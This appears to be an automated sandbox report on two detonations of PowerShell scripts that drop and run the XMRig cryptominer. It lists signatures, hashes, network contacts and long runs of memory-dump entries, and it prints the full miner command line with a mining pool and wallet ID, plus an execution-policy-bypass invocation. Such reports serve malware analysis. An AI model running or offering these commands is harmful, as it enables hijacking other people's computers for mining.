memory/2952-81-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-82-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-83-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-84-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-85-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-86-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-87-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-88-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-89-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-90-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-91-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-92-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-93-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-94-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-95-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-96-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-97-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-98-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-99-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-100-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-101-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-102-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-103-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-104-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-105-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-106-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-107-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-108-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-109-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-110-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-111-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-112-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-113-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-114-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-115-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-116-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-117-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

memory/2952-118-0x00007FF75DCD0000-0x00007FF75E903000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:46

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

memory/3440-0-0x00007FFB7BAB3000-0x00007FFB7BAB5000-memory.dmp

memory/3440-6-0x00000157D2BE0000-0x00000157D2C02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1oluqplz.xgf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3440-11-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/3440-12-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/3440-14-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/3440-15-0x00000157EBE70000-0x00000157EBE82000-memory.dmp

memory/3440-16-0x00000157D2CC0000-0x00000157D2CCA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2396-47-0x0000014B13200000-0x0000014B13220000-memory.dmp

memory/2396-48-0x0000014B13370000-0x0000014B13390000-memory.dmp

memory/2396-49-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/3440-50-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/2396-53-0x0000014B13390000-0x0000014B133B0000-memory.dmp

memory/3440-52-0x00007FFB7BAB3000-0x00007FFB7BAB5000-memory.dmp

memory/2396-51-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/3440-54-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/2396-55-0x0000014B133B0000-0x0000014B133D0000-memory.dmp

memory/3440-56-0x00007FFB7BAB0000-0x00007FFB7C571000-memory.dmp

memory/2396-57-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-59-0x0000014B13390000-0x0000014B133B0000-memory.dmp

memory/2396-58-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-60-0x0000014B133B0000-0x0000014B133D0000-memory.dmp

memory/2396-61-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-62-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-63-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-64-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-65-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-66-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-67-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-68-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-69-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-70-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-71-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-72-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-73-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-74-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-75-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-76-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-77-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-78-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-79-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-80-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-81-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-82-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-83-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-84-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-85-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-86-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-87-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-88-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-89-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-90-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-91-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-92-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-93-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-94-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-95-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-96-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-97-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-98-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-99-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-100-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-101-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-102-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-103-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-104-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-105-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-106-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-107-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-108-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-109-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-110-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-111-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-112-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-113-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-114-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-115-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-116-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-117-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-118-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

memory/2396-119-0x00007FF7F3550000-0x00007FF7F4183000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:01

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2988-0-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/2988-5-0x0000026E42EB0000-0x0000026E42ED2000-memory.dmp

memory/2988-7-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/2988-9-0x0000026E5B550000-0x0000026E5B5C6000-memory.dmp

memory/2988-10-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xcftyytu.yec.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2988-25-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/2988-48-0x0000026E5B530000-0x0000026E5B542000-memory.dmp

memory/2988-61-0x0000026E42EF0000-0x0000026E42EFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/828-90-0x000001BC95D10000-0x000001BC95D30000-memory.dmp

memory/2988-91-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/2988-92-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/828-93-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/2988-94-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/828-95-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-96-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-97-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-98-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-99-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-100-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-101-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-102-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-103-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-104-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-105-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-106-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-107-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-108-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-109-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-110-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-111-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-112-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-113-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-114-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-115-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-116-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-117-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-118-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-119-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-120-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-121-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-122-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-123-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-124-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-125-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-126-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-127-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-128-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-129-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-130-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-131-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-132-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-133-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-134-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-135-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-136-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-137-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-138-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-139-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-140-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-141-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-142-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-143-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-144-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-145-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-146-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-147-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-148-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-149-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-150-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-151-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-152-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-153-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-154-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-155-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp

memory/828-156-0x00007FF7F6500000-0x00007FF7F7133000-memory.dmp